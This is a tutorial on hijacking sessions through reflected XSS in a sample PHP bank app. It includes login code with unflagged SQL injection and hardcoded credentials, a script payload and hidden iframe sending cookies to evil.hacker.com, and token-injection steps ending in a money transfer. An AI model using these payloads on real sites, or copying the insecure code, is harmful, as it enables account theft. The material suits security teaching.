Session Hijacking Using Reflected XSS: Example Application

Session hijacking occurs when an attacker captures a session token and injects it into their own browser to gain access to the victim's authenticated session.

There are some limitations of session hijacking attacks:
1) Stealing cookies is useless if the target is using https:// for browsing.
2) Most cookies expire when the target logs out of a session. This also logs the attacker out of the session.
3) Many websites do not support parallel logins, which negates the use of a stolen cookie.
  
In this tutorial, we will see how to steal session cookie using Reflected Cross-Site Scripting Attack.

Cross-site scripting (XSS) is a vulnerability that permits an attacker to inject code (typically HTML or Javascript) into contents of a website not under the attacker's control. When a victim views such a page, the injected code executes in the victim's browser. Thus, the attacker has bypassed the browser's same origin policy and can steal victim's private information associated with the website in question.
In a reflected XSS attack, the attack is in the request itself (frequently the URL) and the vulnerability occurs when the server inserts the attack in the response verbatim or incorrectly escaped or sanitized. The victim triggers the attack by browsing to a malicious URL created by the attacker.

We develop a web application which has a reflected XSS vulnerability. When a user logs into the application, a session is created for him. The attacker creates a malicious URL to exploit the XSS vulnerability and capture the session token of the logged in user.


Web Server Name: meru.mycompany.com
Attacker Machine : evil.hacker.com


1) Log in to the application by viewing the URL  http://meru.mycompany.com/login.html. Enter username and password. On successful authentication, a session is created for the user. And the user is redirected to the URL http://meru.mycompany.com/search.php.

 login.php
<?php

if(!isset($_SESSION['loginid'])){
if(isset($_POST['submit'])){
  $loginid = $_POST['loginid'];
  $passwd = $_POST['passwd'];

  $conn = new mysqli('localhost','shabbir','shabbir','mybank');
  if($conn->connect_error){
    die('error connecting to server' . $conn->connect_error);
  }


  $sql = "select loginid,passwd,custname from customer where loginid = '$loginid' and passwd = '$passwd'";

  $result = $conn->query($sql);

  if ($result->num_rows == 1){
    $row = $result->fetch_assoc();
    $custname = $row['custname'];

    session_start();
    $_SESSION['loginid'] = $loginid;
    $_SESSION['custname'] = $custname;

    header('Location: search.php');
  }
  $error_msg="invalid username or password.\n";

  $conn->close();
}
}
?>


<html>
<head>
<title>Welcome to mybank</title>
</head>

<body>
<h2>Enter login details</h2>
<?php
if(! empty($error_msg)){
        echo "<strong>" . $error_msg . "</strong><br/>";
}
?>

<form action="login.php" method="post">

<label>Login id:</label>
<input type="text" name="loginid"  /> <br/>

<label>Password:</label>
<input type="text" name="passwd"  /> <br/>

<input type="submit" name="submit" value="submit"/>
</form>
</body>
</html>





 2)  The page 'search.php' contains reflected XSS vulnerability. The application simply copies the  search keyword into  the output as shown below.

This behavior of taking user-supplied input and inserting it into the HTML of the server's response is one of the signatures of reflected XSS vulnerabilities.

search.php
<?php
session_start();
?>

<html>
<head>
<title>Welcome to mybank</title>
</head>

<body>

<?php
if(!isset($_SESSION['loginid'])){
  echo "please login";

} else{
  if(isset($_GET['submit'])){

      $item = $_GET['item'];
      echo "You searched for " . $item . "<br/>";

  } else{
?>

<h2>Enter Search Item </h2>

<form action="search.php" method="get">

<label>Search Keyword:</label>
<input type="text" name="item"  /> <br/>
<input type="submit" name="submit" value="submit"/>
</form>

<?php
}
}
?>

</body>
</html>



 3) If we enter the following Javascript as the search keyword  car<script>alert(document.cookie)</script>.

Then we get a pop up dialog displaying the session id as shown below.

4) Through some means, the attacker feeds the following URL to the user. 

http://meru.mycompany.com/search.php?item=car<script>var+i=new+Image;+i.src="http://evil.hacker.com/xss.php"%2bdocument.cookie;</script>&submit=submit

The user requests from the application the URL fed to him by the attacker.

Because of the XSS vulnerability, the server's response contains the javascript the attacker created.

The user's browser executes the attacker's javascript . The malicious javascript created by the attacker is:

var i=new Image; i.src="http://evil.hacker.com/xss.php"+document.cookie 

This code causes the user's browser to make a request to 'evil.hacker.com'. The request contains the user's session token for the application. 

Note that the victim does not even need to explicitly click on the malicious link. Suppose the attacker owns 'evil.hacker.com' and creates a page 'attack.php'  with an <iframe> pointing to the malicious link; if the victim visits 'http://evil.hacker.com/attack.php', the attack will silently be activated. 

<html>
<body>
<iframe height="0" width="0" src='http://meru.mycompany.com/search.php?item=car<script>var+i=new+Image;+i.src="http://evil.hacker.com/"%2bdocument.cookie;</script>&submit=submit'></iframe>
</body>
</html>

5) The attacker on 'evil.hacker.com'  runs 'Wireshark' and captures the session token as shown below:

6) Now the attacker has to insert this session token in a cookie in his browser and hijack the user session. The attacker will perform the following steps:

6.1) Open Firefox Web Browser. Install Grease Monkey Firefox extension

https://addons.mozilla.org/en-US/firefox/addon/greasemonkey


6.2) Install Cookie Injector script in Grease Monkey.

http://userscripts-mirror.org/scripts/show/119798

http://dustint.com/post/12/cookie-injection-using-greasemonkey

6.1) Copy the session token from 'Wireshark' output. Right click on Request URI. Select Copy -> Bytes -> Printable Text Only. Then paste in 'gedit' text editor as shown below:

/xss.php?c=PHPSESSID%3Dnef6vmd3ag8h7lo50m8190iee5

6.2) Edit the copied text as shown below.

Cookie: PHPSESSID=nef6vmd3ag8h7lo50m8190iee5

6.3) Copy the above line.

6.4) Start Firefox web browser. Press Alt+C to open the Cookie Injector dialog. Paste the above copied line and click OK as shown below.

6.5) The session has been hijacked. The attacker accesses the URL http://meru.mycompany.com/transfer.php  and transfers money from the victim's account.